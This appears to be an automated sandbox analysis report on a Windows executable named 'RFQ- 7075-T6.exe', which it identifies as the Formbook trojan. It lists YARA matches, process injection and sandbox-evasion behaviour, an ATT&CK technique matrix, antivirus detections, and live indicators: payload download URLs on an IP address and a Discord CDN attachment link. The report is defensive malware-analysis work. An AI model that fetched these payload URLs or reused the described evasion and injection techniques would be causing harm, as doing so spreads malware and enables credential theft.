        Source: 00000001.00000000.230933027.00000000003C1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000001.00000000.230933027.00000000003C1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000001.00000000.230933027.00000000003C1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000002.237294660.0000000003619000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000000.00000002.237294660.0000000003619000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000000.00000002.237294660.0000000003619000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: Process Memory Space: RFQ- 7075-T6.exe PID: 3388, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: Process Memory Space: RFQ- 7075-T6.exe PID: 5432, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 172
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeCode function: 0_2_023C48A00_2_023C48A0
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeCode function: 0_2_023C5E580_2_023C5E58
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeCode function: 0_2_023C48910_2_023C4891
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeCode function: 0_2_023C5E480_2_023C5E48
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeCode function: 0_2_023C0EE00_2_023C0EE0
        Source: RFQ- 7075-T6.exe, 00000000.00000000.224033234.0000000000212000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMicrosoft.CodeAnalysis.Hosting.Server.Features.exe4 vs RFQ- 7075-T6.exe
        Source: RFQ- 7075-T6.exe, 00000000.00000002.237468256.0000000004B90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRealProxyFlagsBadSignature.dllX vs RFQ- 7075-T6.exe
        Source: RFQ- 7075-T6.exeBinary or memory string: OriginalFilenameMicrosoft.CodeAnalysis.Hosting.Server.Features.exe4 vs RFQ- 7075-T6.exe
        Source: RFQ- 7075-T6.exeVirustotal: Detection: 21%
        Source: RFQ- 7075-T6.exeReversingLabs: Detection: 14%
        Source: RFQ- 7075-T6.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\RFQ- 7075-T6.exe "C:\Users\user\Desktop\RFQ- 7075-T6.exe"
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess created: C:\Users\user\Desktop\RFQ- 7075-T6.exe C:\Users\user\Desktop\RFQ- 7075-T6.exe
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 172
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess created: C:\Users\user\Desktop\RFQ- 7075-T6.exe C:\Users\user\Desktop\RFQ- 7075-T6.exeJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ- 7075-T6.exe.logJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER277B.tmpJump to behavior
        Source: classification engineClassification label: mal100.troj.evad.winEXE@4/5@1/3
        Source: RFQ- 7075-T6.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5432
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: RFQ- 7075-T6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: RFQ- 7075-T6.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: RFQ- 7075-T6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: C:\Users\user\Desktop\RealProxyFlagsBadSignature.pdb source: RFQ- 7075-T6.exe, 00000000.00000002.237468256.0000000004B90000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: c:\Users\User\AppData\Local\Temp\Microsoft.CodeAnalysis.Hosting.Server.Features.pdb source: RFQ- 7075-T6.exe
        Source: Binary string: C:\Users\user\Desktop\RealProxyFlagsBadSignature.pdbd source: RFQ- 7075-T6.exe, 00000000.00000002.237468256.0000000004B90000.00000004.08000000.00040000.00000000.sdmp

        Data Obfuscation

        barindex
        Source: RFQ- 7075-T6.exe, CodeAnalysis.Hosting.Server.Features/DWLcvAvOeZDcRlX.cs.Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 0.0.RFQ- 7075-T6.exe.210000.0.unpack, CodeAnalysis.Hosting.Server.Features/DWLcvAvOeZDcRlX.cs.Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe TID: 5556Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exe TID: 2916Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: RFQ- 7075-T6.exe, 00000000.00000002.232496959.0000000002637000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dNzNYQSUljWcBlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctpsXQwaLozINpRhUfKShWMkeoEFQaeNzNYQSUljWcBlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctpsXQwaLozINpRhUfKShWMkeoEFQrhTNzNYQSUljWcBlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctpsXQwaLozINpRhUfKShWMkeoEFQemuNzNYQSUljWcBlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctpsXQwaLozINpRhUfKShWMkeoEFQseRNzNYQSUljWcBlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctpsXQwaLozINpRhUfKShWMkeoEFQ
        Source: RFQ- 7075-T6.exe, 00000000.00000002.232496959.0000000002637000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: kQeMuGIULxzSSWBFvoGmFrytHnvtzMnrinyuvSjZQcGjDOtBUdtvkjXdoFFcKkpUJHFzXHecaBrdlOKNOPZ
        Source: RFQ- 7075-T6.exe, 00000000.00000002.237468256.0000000004B90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: CdNzNYQSUljWcBlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctpsXQwaLozINpRhUfKShWMkeoEFQaeNzNYQSUljWcBlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctpsXQwaLozINpRhUfKShWMkeoEFQrhTNzNYQSUljWcBlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctpsXQwaLozINpRhUfKShWMkeoEFQemuNzNYQSUljWcBlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctpsXQwaLozINpRhUfKShWMkeoEFQseRNzNYQSUljWcBlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctpsXQwaLozINpRhUfKShWMkeoEFQ
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeMemory written: C:\Users\user\Desktop\RFQ- 7075-T6.exe base: 3C0000 value starts with: 4D5AJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeProcess created: C:\Users\user\Desktop\RFQ- 7075-T6.exe C:\Users\user\Desktop\RFQ- 7075-T6.exeJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeQueries volume information: C:\Users\user\Desktop\RFQ- 7075-T6.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\RFQ- 7075-T6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 1.0.RFQ- 7075-T6.exe.3c0000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000000.00000002.237260939.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000000.230933027.00000000003C1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.237294660.0000000003619000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 1.0.RFQ- 7075-T6.exe.3c0000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000000.00000002.237260939.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000000.230933027.00000000003C1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.237294660.0000000003619000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsWindows Management InstrumentationPath Interception111
        Process Injection
        1
        Masquerading
        OS Credential Dumping11
        Security Software Discovery
        Remote Services1
        Archive Collected Data
        Exfiltration Over Other Network Medium11
        Encrypted Channel
        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Disable or Modify Tools
        LSASS Memory31
        Virtualization/Sandbox Evasion
        Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
        Ingress Tool Transfer
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
        Virtualization/Sandbox Evasion
        Security Account Manager1
        Remote System Discovery
        SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
        Non-Application Layer Protocol
        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
        Process Injection
        NTDS12
        System Information Discovery
        Distributed Component Object ModelInput CaptureScheduled Transfer113
        Application Layer Protocol
        SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
        Software Packing
        LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        RFQ- 7075-T6.exe21%VirustotalBrowse
        RFQ- 7075-T6.exe15%ReversingLabsByteCode-MSIL.Trojan.Generic
        RFQ- 7075-T6.exe100%AviraHEUR/AGEN.1251478
        RFQ- 7075-T6.exe100%Joe Sandbox ML
        No Antivirus matches
        SourceDetectionScannerLabelLinkDownload
        1.0.RFQ- 7075-T6.exe.3c0000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
        0.0.RFQ- 7075-T6.exe.210000.0.unpack100%AviraHEUR/AGEN.1251478Download File
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://109.206.241.81/htdocs/qWDXb.exe16%VirustotalBrowse
        http://109.206.241.81/htdocs/qWDXb.exe100%Avira URL Cloudmalware
        www.lafuriaroja.team/jn86/0%VirustotalBrowse
        www.lafuriaroja.team/jn86/0%Avira URL Cloudsafe
        http://109.206.241.8140%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        cdn.discordapp.com
        162.159.135.233
        truefalse
          high
          NameMaliciousAntivirus DetectionReputation
          http://109.206.241.81/htdocs/qWDXb.exetrue
          • 16%, Virustotal, Browse
          • Avira URL Cloud: malware
          unknown
          www.lafuriaroja.team/jn86/true
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          low
          https://cdn.discordapp.com/attachments/1005703293437235255/1005705055426588785/RealProxyFlagsBadSignature.dllfalse
            high
            NameSourceMaliciousAntivirus DetectionReputation
            https://cdn.discordapp.com/attachments/1005703293437235255/1005705055426588785/RealProxyFlagsBadSignRFQ- 7075-T6.exe, 00000000.00000002.232356146.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://109.206.241.814RFQ- 7075-T6.exe, 00000000.00000002.232496959.0000000002637000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              low
              https://cdn.discordapp.comRFQ- 7075-T6.exe, 00000000.00000002.232356146.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRFQ- 7075-T6.exe, 00000000.00000002.232356146.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  109.206.241.81
                  unknownGermany
                  209929AWMLTNLfalse
                  162.159.135.233
                  cdn.discordapp.comUnited States
                  13335CLOUDFLARENETUSfalse
                  IP
                  192.168.2.1
                  Joe Sandbox Version:35.0.0 Citrine
                  Analysis ID:680627
                  Start date and time: 08/08/202222:20:082022-08-08 22:20:08 +02:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 5m 28s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:RFQ- 7075-T6.exe
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:29
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@4/5@1/3
                  EGA Information:
                  • Successful, ratio: 100%
                  HDC Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 17
                  • Number of non-executed functions: 2
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Adjust boot time
                  • Enable AMSI
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                  • Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.182.143.212
                  • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  TimeTypeDescription
                  22:21:11API Interceptor1x Sleep call for process: RFQ- 7075-T6.exe modified
                  22:21:48API Interceptor1x Sleep call for process: WerFault.exe modified
                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  109.206.241.81ICPO07082299976.docGet hashmaliciousBrowse
                  • 109.206.241.81/htdocs/eZYWw.exe
                  Contract - Wipak Oy.xlsxGet hashmaliciousBrowse
                  • 109.206.241.81/htdocs/zTALg.exe
                  t3uEMr422v.exeGet hashmaliciousBrowse
                  • 109.206.241.81/htdocs/RdSwQ.exe
                  cTdude9J3m.exeGet hashmaliciousBrowse
                  • 109.206.241.81:55527/
                  uED2AIUn6R.exeGet hashmaliciousBrowse
                  • 109.206.241.81/htdocs/AnWLP.exe
                  PO 7500093232.exeGet hashmaliciousBrowse
                  • 109.206.241.81/htdocs/GsLQA.exe
                  System.Activities.exeGet hashmaliciousBrowse
                  • 109.206.241.81/htdocs/yCBAj.exe
                  SOA for July.exeGet hashmaliciousBrowse
                  • 109.206.241.81/htdocs/ZsRSF.exe
                  SecuriteInfo.com.MSIL.Downloadergen2.14361.exeGet hashmaliciousBrowse
                  • 109.206.241.81/htdocs/RkPHN.exe
                  SecuriteInfo.com.Trojan.MSIL.BluStealer.NX.MTB.13214.exeGet hashmaliciousBrowse
                  • 109.206.241.81/htdocs/CnBAH.exe
                  162.159.135.233We7WnoqeXe.exeGet hashmaliciousBrowse
                  • cdn.discordapp.com/attachments/878034206570209333/908097655173947432/slhost.exe
                  mosoxxxHack.exeGet hashmaliciousBrowse
                  • cdn.discordapp.com/attachments/710557342755848243/876828681815871488/clp.exe
                  Sales-contract-deaho-180521-poweruae.docGet hashmaliciousBrowse
                  • cdn.discordapp.com/attachments/843685789120331799/844316591284944986/poiu.exe
                  PURCHASE ORDER E3007921.EXEGet hashmaliciousBrowse
                  • cdn.discordapp.com/attachments/809311531652087809/839820005927550996/Youngest_Snake.exe
                  Waybill Document 22700456.exeGet hashmaliciousBrowse
                  • cdn.discordapp.com/attachments/809311531652087809/839856358152208434/May_Blessing.exe
                  COMPANY REQUIREMENT.docGet hashmaliciousBrowse
                  • cdn.discordapp.com/attachments/819674896988242004/819677189900861500/harcout.exe
                  Email data form.docGet hashmaliciousBrowse
                  • cdn.discordapp.com/attachments/789279517516365865/789279697203757066/angelx.scr
                  Down Payment.docGet hashmaliciousBrowse
                  • cdn.discordapp.com/attachments/788946375533789214/788947376849027092/atlasx.scr
                  Vessel details.docGet hashmaliciousBrowse
